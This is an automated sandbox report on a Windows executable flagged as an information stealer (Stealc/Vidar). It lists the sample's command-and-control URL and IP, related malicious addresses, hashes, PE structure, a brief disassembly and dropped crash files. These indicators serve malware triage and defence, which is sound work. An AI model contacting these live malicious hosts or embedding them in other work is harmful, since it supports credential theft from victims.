                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://62.122.184.144/trueunknown
                    http://62.122.184.144/f88d87a7e087e100.phptrueunknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://62.122.184.144/f88d87a7e087e100.php)QmMKz5d4j7.exe, 00000000.00000002.2247177078.00000000006F2000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      http://upx.sf.netAmcache.hve.4.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://62.122.184.144kQmMKz5d4j7.exe, 00000000.00000002.2247177078.00000000006BD000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        http://62.122.184.144/9QmMKz5d4j7.exe, 00000000.00000002.2247177078.00000000006F2000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://62.122.184.144gQmMKz5d4j7.exe, 00000000.00000002.2247026062.000000000067E000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://62.122.184.144/wsQmMKz5d4j7.exe, 00000000.00000002.2247177078.00000000006F2000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://62.122.184.144/f88d87a7e087e100.php5QmMKz5d4j7.exe, 00000000.00000002.2247177078.00000000006F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://62.122.184.144/f88d87a7e087e100.phpUQmMKz5d4j7.exe, 00000000.00000002.2247177078.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, QmMKz5d4j7.exe, 00000000.00000002.2247177078.000000000070A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://62.122.184.144/f88d87a7e087e100.phpeQmMKz5d4j7.exe, 00000000.00000002.2247177078.00000000006F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://62.122.184.144QmMKz5d4j7.exe, 00000000.00000002.2247026062.000000000067E000.00000004.00000020.00020000.00000000.sdmp, QmMKz5d4j7.exe, 00000000.00000002.2247177078.00000000006BD000.00000004.00000020.00020000.00000000.sdmptrueunknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    62.122.184.144
                                    unknownunknown
                                    49120GORSET-ASRUtrue
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1528573
                                    Start date and time:2024-10-08 02:33:05 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 4m 25s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:8
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:QmMKz5d4j7.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:14f08bd33d03c8c7fcc198cb30dc29f6.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@2/5@0/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 24
                                    • Number of non-executed functions: 168
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    TimeTypeDescription
                                    20:34:16API Interceptor1x Sleep call for process: WerFault.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    62.122.184.144c95eb189cffef0c6b222d31de3c7ed0f9cabad48a38aa.exeGet hashmaliciousStealc, VidarBrowse
                                    • 62.122.184.144/f88d87a7e087e100.php
                                    No context
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    GORSET-ASRUc95eb189cffef0c6b222d31de3c7ed0f9cabad48a38aa.exeGet hashmaliciousStealc, VidarBrowse
                                    • 62.122.184.144
                                    1.exeGet hashmaliciousRedLineBrowse
                                    • 62.122.184.51
                                    zJO55iLN3G.elfGet hashmaliciousUnknownBrowse
                                    • 31.40.39.14
                                    4VOPmuZZVV.exeGet hashmaliciousGoBrutBrowse
                                    • 62.122.184.95
                                    0Rae7oghna.elfGet hashmaliciousMiraiBrowse
                                    • 46.173.48.47
                                    PIyT9A3jfC.exeGet hashmaliciousPushdoBrowse
                                    • 62.122.190.121
                                    eQcKjYOV30.exeGet hashmaliciousPushdoBrowse
                                    • 62.122.190.121
                                    1EsDtA4mep.exeGet hashmaliciousPushdoBrowse
                                    • 62.122.190.121
                                    file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                    • 62.122.190.121
                                    file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                    • 62.122.190.121
                                    No context
                                    No context
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):0.9633160447534854
                                    Encrypted:false
                                    SSDEEP:384:1fGKOgkuwZdFDHq+seyjTTzuiF5Y4IO8sfq:kpFDHq+IjHzuiF5Y4IO8
                                    MD5:B8753711978B823349CEB805F7972EE2
                                    SHA1:DB8FD1418DED6002AAF6880F3C9B77BA6600F5D4
                                    SHA-256:07E92A56B3477158BFBBF4C74B66FEA9A24F487C452E27E25A11EF0C07CBF693
                                    SHA-512:403E4393373028547E204D118984BD0E934392567BDE27B69F78C212CA63D0D4A8EC1FBB97B430F7F939CA5585FEB3994F32831FA618552CCB07410B082DF59C
                                    Malicious:true
                                    Reputation:low
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.2.1.2.3.7.2.5.2.7.4.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.8.2.1.2.3.7.7.2.1.4.8.8.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.2.7.2.3.5.f.4.-.f.0.1.d.-.4.c.a.3.-.9.f.b.1.-.e.c.d.e.3.4.8.0.1.2.0.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.0.4.a.2.3.d.d.-.5.9.b.c.-.4.8.e.e.-.b.0.5.7.-.4.8.1.1.2.d.d.4.7.9.4.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.Q.m.M.K.z.5.d.4.j.7...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.8.4.-.0.0.0.1.-.0.0.1.4.-.a.a.3.4.-.3.9.c.1.1.9.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.7.7.1.f.d.a.7.c.5.c.c.5.a.1.f.a.b.8.e.f.1.f.b.5.e.3.7.0.4.f.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.f.3.b.c.9.b.1.1.d.0.d.6.2.9.a.8.b.5.b.e.0.f.0.f.4.a.e.0.a.e.6.4.0.d.4.9.4.6.3.!.Q.m.M.K.z.5.d.4.j.7...e.x.e.....T.a.r.g.e.t.A.p.p.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 00:33:57 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):65320
                                    Entropy (8bit):2.0033434199693896
                                    Encrypted:false
                                    SSDEEP:192:NrLGXgwgdnXB1OOROswIIV2RxhY5wVfuxuRn170i0B34SSgL3PMb2bclKDyDlcGs:xnwgRJRROoRLyzOkPJIdCG5IjT
                                    MD5:DE2F9422887989A4A1A21AB07B1F4F53
                                    SHA1:4525B8628DB2F8A26D89D022F625A5431F42FBF7
                                    SHA-256:55C95C2BAE47F008CC92140A1832C110EDA7455B177D1D8025A24AB5EF009F5A
                                    SHA-512:C43DF2303097689261A1C88171B7A273C2233B30163A3019542850DB38CA33677800BAEB060A32F46C2DCCA869894053CC9CB1110CDE845FE2D4E5C241D7175A
                                    Malicious:false
                                    Reputation:low
                                    Preview:MDMP..a..... ........}.g............4...............<............*..........T.......8...........T............3..........................................................................................................eJ......H.......GenuineIntel............T............}.g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8336
                                    Entropy (8bit):3.701593267917909
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJbpc6Zn4Q6YEI1lSUWmQgmfaqkexDRz2pDr89b9YsfkAfm:R6lXJby6ZnH6YEoSUpQgmfaFEDRb9Lfk
                                    MD5:A4AD72F0186C3BE17930CD6A5CFA7A38
                                    SHA1:45A5F3F9A0E50E40DF942223455C4E0624828F0D
                                    SHA-256:270F3F76AA2ED7B3F1166256CA05FFAB74D03CC1163EDFDDE5EBFEDAA8EEA527
                                    SHA-512:94A509C3A4C312E4F5BD2C1400AA92F7AD23862D74D8EFC64A32451FB79C4723FD103C25C293BDC41A023742EE77FDD422E884C1A196C9C470C8767F9D7103B9
                                    Malicious:false
                                    Reputation:low
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.2.8.<./.P.i.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4579
                                    Entropy (8bit):4.475469443746776
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsNJg77aI9HkWpW8VYVYm8M4J8xaFT+q8yIDmXNHeTd:uIjfnI7197VZJTKONHGd
                                    MD5:A6FAC37DFF538F7E355A3C952DC41368
                                    SHA1:4FDADAA970FFEB3E53DA238C38C2D628015AE61D
                                    SHA-256:60D43364645F04F90810A9DE325EE59F5FEF43700769C59D95EACF0383E638B7
                                    SHA-512:CF12C54C4E4AC6953A600EADFB68095EDF5FB3DE2F3BD102B86B1471AD7E037767F9282C00741C119504E50AA8F6092F8F81579EB0541E91EBABBC3B15020737
                                    Malicious:false
                                    Reputation:low
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533736" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:MS Windows registry file, NT/2000 or above
                                    Category:dropped
                                    Size (bytes):1835008
                                    Entropy (8bit):4.42158166529437
                                    Encrypted:false
                                    SSDEEP:6144:hSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNs0uhiTw:4vloTMW+EZMM6DFyi03w
                                    MD5:CF333C093BCFDE0E0EC20D602A3ACEB1
                                    SHA1:F9FA34FAC544523D93A9910F44B5094E3E8AA064
                                    SHA-256:94026CBB2F64A65F61A079ED4399F3FDF1FEA8218601A57F932DA39834709F07
                                    SHA-512:F433138EB785B5E72AF31FADCFB2FF824803F9325AF269303889E8D80F94DDA2A8D8E2D4F2243C7D572C2290F15717A9D45A8A0F76E25DDC76370AD55EC0D198
                                    Malicious:false
                                    Reputation:low
                                    Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....................................................................................................................................................................................................................................................................................................................................................m*..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):6.353380373649084
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:QmMKz5d4j7.exe
                                    File size:453'632 bytes
                                    MD5:14f08bd33d03c8c7fcc198cb30dc29f6
                                    SHA1:5f3bc9b11d0d629a8b5be0f0f4ae0ae640d49463
                                    SHA256:79687ef32097ae98d2d577f0d362ffed81fd058212a210a8ffa371d7fc1be4f0
                                    SHA512:82f6f076ab818f8cc6ca22620977f837bb3c64699f5d2f6acbe1da37fee9ebc9eea44bb76ea9205284df5cb27123acb69168b6bf286b50c55168c285709db847
                                    SSDEEP:6144:Cvk5/0UUS0436oerlk7DWpnocMbqj6m8Vo/DaZEjy6BbO42T8:550UA43FN7+ocMbUT8anNO4O
                                    TLSH:BAA4BF0262D9BEA0F5E24E3B8D1EFBECA56DF851DE146657321C271F1B702A3D262311
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........io..............~.......~.......~.......p..........3....~.......~.......~......Rich............PE..L...3\<d...................
                                    Icon Hash:452551454555410d
                                    Entrypoint:0x403bf9
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                    Time Stamp:0x643C5C33 [Sun Apr 16 20:36:03 2023 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:cf2df69e8bb6acbf3b231da2c6f4bda2
                                    Instruction
                                    call 00007F9E90B449F9h
                                    jmp 00007F9E90B4194Eh
                                    push dword ptr [00451258h]
                                    call dword ptr [0040F12Ch]
                                    test eax, eax
                                    je 00007F9E90B41AC4h
                                    call eax
                                    push 00000019h
                                    call 00007F9E90B442DBh
                                    push 00000001h
                                    push 00000000h
                                    call 00007F9E90B41280h
                                    add esp, 0Ch
                                    jmp 00007F9E90B41245h
                                    mov edi, edi
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 20h
                                    mov eax, dword ptr [ebp+08h]
                                    push esi
                                    push edi
                                    push 00000008h
                                    pop ecx
                                    mov esi, 0040F3C0h
                                    lea edi, dword ptr [ebp-20h]
                                    rep movsd
                                    mov dword ptr [ebp-08h], eax
                                    mov eax, dword ptr [ebp+0Ch]
                                    pop edi
                                    mov dword ptr [ebp-04h], eax
                                    pop esi
                                    test eax, eax
                                    je 00007F9E90B41ACEh
                                    test byte ptr [eax], 00000008h
                                    je 00007F9E90B41AC9h
                                    mov dword ptr [ebp-0Ch], 01994000h
                                    lea eax, dword ptr [ebp-0Ch]
                                    push eax
                                    push dword ptr [ebp-10h]
                                    push dword ptr [ebp-1Ch]
                                    push dword ptr [ebp-20h]
                                    call dword ptr [0040F160h]
                                    leave
                                    retn 0008h
                                    mov edi, edi
                                    push ebp
                                    mov ebp, esp
                                    push ecx
                                    push ebx
                                    mov eax, dword ptr [ebp+0Ch]
                                    add eax, 0Ch
                                    mov dword ptr [ebp-04h], eax
                                    mov ebx, dword ptr fs:[00000000h]
                                    mov eax, dword ptr [ebx]
                                    mov dword ptr fs:[00000000h], eax
                                    mov eax, dword ptr [ebp+08h]
                                    mov ebx, dword ptr [ebp+0Ch]
                                    mov ebp, dword ptr [ebp-04h]
                                    mov esp, dword ptr [ebx-04h]
                                    jmp eax
                                    pop ebx
                                    leave
                                    retn 0008h
                                    pop eax
                                    pop ecx
                                    xchg dword ptr [esp], eax
                                    jmp eax
                                    pop eax
                                    pop ecx
                                    xchg dword ptr [esp], eax
                                    jmp eax
                                    pop eax
                                    pop ecx
                                    xchg dword ptr [esp], eax
                                    jmp eax
                                    Programming Language:
                                    • [ASM] VS2010 build 30319
                                    • [C++] VS2010 build 30319
                                    • [ C ] VS2010 build 30319
                                    • [IMP] VS2008 SP1 build 30729
                                    • [RES] VS2010 build 30319
                                    • [LNK] VS2010 build 30319
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x498e00x78.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x600000x1f108.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x499580x1c.rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x48e600x40.rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0xf0000x1fc.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000xd4dd0xd6003dfd2ef3b75b905f822f9a4db23cf4efFalse0.6018545560747663data6.671032529233709IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0xf0000x3b4720x3b60019ecc14b3634c6fe07d19ddba120b63cFalse0.751422697368421data6.86459518036546IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x4b0000x11cc00x6000f1501cb59336318a3ac855423cd5b8abFalse0.08390299479166667data1.0917632036158444IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .wagasul0x5d0000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .boyeyaw0x5e0000xd60x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .damupos0x5f0000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x600000x2001080x1f200f659c195b4e958db52bd3dc5d1e23e77unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_CURSOR0x79b780x330Device independent bitmap graphic, 48 x 96 x 1, image size 00.1948529411764706
                                    RT_CURSOR0x79ea80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.33223684210526316
                                    RT_CURSOR0x7a0000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                                    RT_CURSOR0x7aea80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
                                    RT_CURSOR0x7b7500x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                                    RT_CURSOR0x7bce80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.30943496801705755
                                    RT_CURSOR0x7cb900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.427797833935018
                                    RT_CURSOR0x7d4380x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                                    RT_ICON0x60ac00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.3694029850746269
                                    RT_ICON0x60ac00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.3694029850746269
                                    RT_ICON0x619680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.4553249097472924
                                    RT_ICON0x619680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.4553249097472924
                                    RT_ICON0x622100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.4619815668202765
                                    RT_ICON0x622100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.4619815668202765
                                    RT_ICON0x628d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.4552023121387283
                                    RT_ICON0x628d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.4552023121387283
                                    RT_ICON0x62e400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.2682572614107884
                                    RT_ICON0x62e400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.2682572614107884
                                    RT_ICON0x653e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.3074577861163227
                                    RT_ICON0x653e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.3074577861163227
                                    RT_ICON0x664900x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.3599290780141844
                                    RT_ICON0x664900x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.3599290780141844
                                    RT_ICON0x669600xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.56636460554371
                                    RT_ICON0x669600xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.56636460554371
                                    RT_ICON0x678080x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.5523465703971119
                                    RT_ICON0x678080x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.5523465703971119
                                    RT_ICON0x680b00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.6184971098265896
                                    RT_ICON0x680b00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.6184971098265896
                                    RT_ICON0x686180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.46068464730290454
                                    RT_ICON0x686180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.46068464730290454
                                    RT_ICON0x6abc00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.4892120075046904
                                    RT_ICON0x6abc00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.4892120075046904
                                    RT_ICON0x6bc680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.4967213114754098
                                    RT_ICON0x6bc680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.4967213114754098
                                    RT_ICON0x6c5f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.450354609929078
                                    RT_ICON0x6c5f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.450354609929078
                                    RT_ICON0x6cac00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.3784648187633262
                                    RT_ICON0x6cac00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.3784648187633262
                                    RT_ICON0x6d9680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.5058664259927798
                                    RT_ICON0x6d9680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.5058664259927798
                                    RT_ICON0x6e2100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.5599078341013825
                                    RT_ICON0x6e2100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.5599078341013825
                                    RT_ICON0x6e8d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.583092485549133
                                    RT_ICON0x6e8d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.583092485549133
                                    RT_ICON0x6ee400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.37053941908713695
                                    RT_ICON0x6ee400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.37053941908713695
                                    RT_ICON0x713e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.41228893058161353
                                    RT_ICON0x713e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.41228893058161353
                                    RT_ICON0x724900x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.40081967213114755
                                    RT_ICON0x724900x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.40081967213114755
                                    RT_ICON0x72e180x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.46897163120567376
                                    RT_ICON0x72e180x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.46897163120567376
                                    RT_ICON0x732f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.3742004264392324
                                    RT_ICON0x732f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.3742004264392324
                                    RT_ICON0x741a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.5171480144404332
                                    RT_ICON0x741a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.5171480144404332
                                    RT_ICON0x74a480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.6059907834101382
                                    RT_ICON0x74a480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.6059907834101382
                                    RT_ICON0x751100x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.6596820809248555
